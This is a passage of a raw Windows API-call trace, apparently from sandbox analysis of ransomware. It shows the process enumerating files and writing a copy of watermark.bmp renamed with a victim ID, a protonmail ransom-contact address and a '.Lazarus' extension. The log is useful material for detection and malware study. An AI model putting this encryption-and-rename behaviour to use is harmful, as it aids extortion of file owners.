[0081.905] SetLastError (dwErrCode=0x0) [0081.905] GetLastError () returned 0x0 [0081.905] SetLastError (dwErrCode=0x0) [0081.905] GetLastError () returned 0x0 [0081.905] SetLastError (dwErrCode=0x0) [0081.905] GetLastError () returned 0x0 [0081.905] SetLastError (dwErrCode=0x0) [0081.905] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.905] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.906] GetLastError () returned 0x0 [0081.906] SetLastError (dwErrCode=0x0) [0081.906] GetLastError () returned 0x0 [0081.906] SetLastError (dwErrCode=0x0) [0081.906] GetLastError () returned 0x0 [0081.906] SetLastError (dwErrCode=0x0) [0081.906] GetLastError () returned 0x0 [0081.906] SetLastError (dwErrCode=0x0) [0081.906] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x7f2, lpOverlapped=0x0) returned 1 [0081.906] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.906] GetLastError () returned 0x0 [0081.906] SetLastError (dwErrCode=0x0) [0081.907] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0081.907] GetLastError () returned 0x0 [0081.907] SetLastError (dwErrCode=0x0) [0081.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2) returned 0x7cfd0 [0081.907] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0081.907] GetLastError () returned 0x0 [0081.907] SetLastError (dwErrCode=0x0) [0081.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0081.907] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x800, lpOverlapped=0x0) returned 1 [0081.907] GetLastError () returned 0x0 [0081.907] SetLastError (dwErrCode=0x0) [0081.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.907] GetLastError () returned 0x0 [0081.907] SetLastError (dwErrCode=0x0) [0081.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0081.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0081.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0081.907] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0081.908] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0081.908] CloseHandle (hObject=0x42c) returned 1 [0081.911] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0081.911] CloseHandle (hObject=0x41c) returned 1 [0081.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0081.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0081.911] AreFileApisANSI () returned 1 [0081.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68d60 [0081.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0081.911] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0081.913] GetFileType (hFile=0x41c) returned 0x1 [0081.913] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0081.913] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0081.913] GetLastError () returned 0xb7 [0081.913] SetLastError (dwErrCode=0xb7) [0081.913] WriteFile (in: hFile=0x41c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0081.914] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0081.914] CloseHandle (hObject=0x41c) returned 1 [0081.915] AreFileApisANSI () returned 1 [0081.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.915] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68f40 [0081.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0081.915] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml")) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0081.916] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0081.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.917] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.917] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688, dwReserved0=0x1, dwReserved1=0x0, cFileName="watermark.bmp", cAlternateFileName="WATERM~1.BMP")) returned 1 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0081.917] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.917] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0081.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0081.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0081.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0081.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0081.918] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.918] AreFileApisANSI () returned 1 [0081.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\watermark.bmp", lpUsedDefaultChar=0x0) returned 36 [0081.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0081.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.918] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0081.918] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0081.918] AreFileApisANSI () returned 1 [0081.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0081.919] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0081.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0081.919] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0081.919] GetFileType (hFile=0x41c) returned 0x1 [0081.919] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0081.919] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0081.919] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0081.919] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0081.920] CloseHandle (hObject=0x41c) returned 1 [0081.920] AreFileApisANSI () returned 1 [0081.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0081.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69350 [0081.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0081.920] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0081.920] GetFileType (hFile=0x41c) returned 0x1 [0081.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0081.920] CloseHandle (hObject=0x41c) returned 1 [0081.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0081.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0081.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0081.920] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0081.920] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.921] AreFileApisANSI () returned 1 [0081.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0081.921] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0081.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0081.921] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x87910600, ftCreationTime.dwHighDateTime=0x1ca2a27, ftLastAccessTime.dwLowDateTime=0x87910600, ftLastAccessTime.dwHighDateTime=0x1ca2a27, ftLastWriteTime.dwLowDateTime=0x87910600, ftLastWriteTime.dwHighDateTime=0x1ca2a27, nFileSizeHigh=0x0, nFileSizeLow=0x19688)) returned 1 [0081.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0081.921] AreFileApisANSI () returned 1 [0081.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e340 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5d0 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0081.922] GetLastError () returned 0x0 [0081.922] SetLastError (dwErrCode=0x0) [0081.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69170 [0081.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0081.922] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76200 [0081.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0082.059] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.066] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.078] AreFileApisANSI () returned 1 [0082.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0082.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x5a6b8 [0082.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0082.092] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.093] GetFileType (hFile=0x430) returned 0x1 [0082.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0082.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0082.093] AreFileApisANSI () returned 1 [0082.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0082.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0082.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0082.093] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.094] GetFileType (hFile=0x428) returned 0x1 [0082.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0082.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0082.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.094] GetLastError () returned 0x0 [0082.094] SetLastError (dwErrCode=0x0) [0082.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.094] GetLastError () returned 0x0 [0082.094] SetLastError (dwErrCode=0x0) [0082.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0082.094] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, 